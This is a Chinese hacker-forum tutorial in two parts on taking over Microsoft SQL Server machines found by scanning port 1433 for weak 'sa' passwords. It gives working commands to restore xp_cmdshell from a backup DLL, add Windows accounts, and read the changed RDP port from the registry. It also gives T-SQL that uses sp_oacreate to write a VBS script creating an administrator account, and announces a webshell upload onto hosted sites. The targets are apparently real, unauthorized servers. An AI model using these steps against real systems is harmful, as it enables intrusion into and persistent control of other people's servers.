授渔之1433提权全教程

授渔之<一次1433端口提权的过程>

随着网络安全意识的提高，很多服务器的安全防范都非常严了，本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器，于是研究一段时间，虽然进步不大，但是还是想把经验分享一下，正所谓授人以鱼不如授人以渔，而我现在正是告诉你打鱼的方法，下面就以一台服务器为例了，本例使用工具为SQL TOOLS 2.0，论坛有下，请自行搜索。插播不是广告的广告：该工具集成度高，简单的sql指令无须使用分离器，直接在此工具中执行即可，其文件管理功能非常强大，反正我用着太顺手了，推荐一下，本文原创发布于＝华夏黑客同盟论坛＝（）广告完毕。

把扫到的ip和sa及口令填入连接后，用dos命令功能试试列目录

显示错误信息：

Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。

这种情况大家在提权过程中经验遇到啊，它是由于xplog70.dll这个文件被删除或者做了其他限制，导致出现这个错误的

这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用，无法执行命令提权自然就无从说起了，

当然我们还可以考虑其他的存储过程如：sp_oacreate和sp_oamethod来直接添加帐号，或者使用沙盘指令来提权，

但这台服务器，这些功能都被限制了，还是考虑下恢复xplog70.dll了，测试上

传无法成功，这条路走不通了，

这时就考虑用到工具的文件管理功能了

看到了把，和windows的资源管理器一样好用，目录列出来了，搜索一下可以用来提权的东西吧，这里我们首先要去看看

sql的安装路径里的xplog70.dll文件是否存在

看到吧，xplog70.dll文件不见了，被删除了，xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

d盘下有几个网站和几个论坛，这些都是有用的信息，一旦sql的错误无法恢复的时候，我们就可以考虑通过这些网站

来进行提权了，网站的提权，我就是搞不定，痛苦啊＝＝！！继续搜索

在e盘下竟然有个sql2000的原始安装文件备份，怦然心动的感觉是美妙的，感谢我们亲爱的服务器管理员大人，

看看这是什么＝＝＝＝e:\备份软件\MS Sql 2000\DEVELOPER\X86\BINN\

那我们就开始恢复试试吧，切换到sql命令项，输入指令

exec sp_dropextendedproc 'xp_cmdshell' //这个指令是删除sql数据库的xp_cmdshell的存储过程

接着输入指令，重新加载新路径的存储过程。

dbcc addextendedproc ("xp_cmdshell","e:\备份软件\MS Sql

2000\DEVELOPER\X86\BINN\xplog70.dll")

不用理会下面提示的error Message信息，

再去列目录试试，看看是否成功了

接着当然是net user 添加用户提权了，cmd命令没有被限制，添加成功，忘记

查看下端口了

sql命令：exec master..xp_regread

'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'

汗啊～～终端端口竟然被改成52981了，下面去开终端用刚建的帐号登录试试了

授渔之<从1433弱口令到webshell>

前两天给大家做了个1433恢复提权的教程，反响不错，今天再给大家带来个1433提权拿w ebshell的教程。

由于本人对webshell提权属于bc一类，本讲只讲如果通过1433弱口令到拿到webshell，请谅解，本教程无什么技术含量，请高手不要见笑，本实例讲解，原创于=华夏黑客同盟论坛=().

本实例教程使用到的工具：

SQL TOOLS 2.0

Isqlw分离器修正版

某人的小马一只，被我加工过一点^_^

洪儿制作的大马一只，在SQL TOOLS 2.0的工具中填写扫到的ip连接，运行dos列目录命令

提示Error Message:xpsql.cpp: 错误5 来自CreateProcess(第737 行)

这个错误的原因比较复杂，有时是cmd命令被删除，有时是cmd命令的权限被限制，等等原因吧，恢复的可能性很小，具体的，我也没研究透彻，留待以后再探讨了，或者有大牛知道的，告诉我学习一下。

收集下服务器的信息，sql指令输入EXEC xp_msver

服务器是个win2003两核1.5G等相关信息都显示出来了。

下面我们考虑下其他方法，另辟蹊径吧，使用文件管理功能查询个个磁盘下的文件有没有什么可以利用来提权的

有幸在D盘下发现了一个wwwroot的目录，这个目录一般为服务器里存放网站的目录，进去看看了，发现了几个网站

那就去收集下里面网站的信息吧，在目录里的找到了网站的域名等相关信息，网站为a sp+MSsql的网站，下面考虑传个小马到这个网站根目录去。

我传小马的方法，有点特别，我来给你慢慢讲解，由于服务器限制了上传功能，sqltool s的上传功能无法实现，只好考虑通过sql分离器来上传了，这个上传命令很多人曾用来创建用户提权，我试过了，无法提上来，只好另做他用了。

代码：

declare @o int, @f int, @t int, @ret int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1

exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.N ETWORK")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&puterName '

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,gro up")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","test")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'

exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) '

exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'

我的小马就是通过这个写入功能来改造上传的，小马我等下发出来。

废话说了很多了，再说明一点，这个上传需要到的sql的存储过程为sp_oacreate和sp_ oamethod这两个，如果这两个存储过程被禁用了，那就想办法恢复了，恢复的思路和上次教程一样。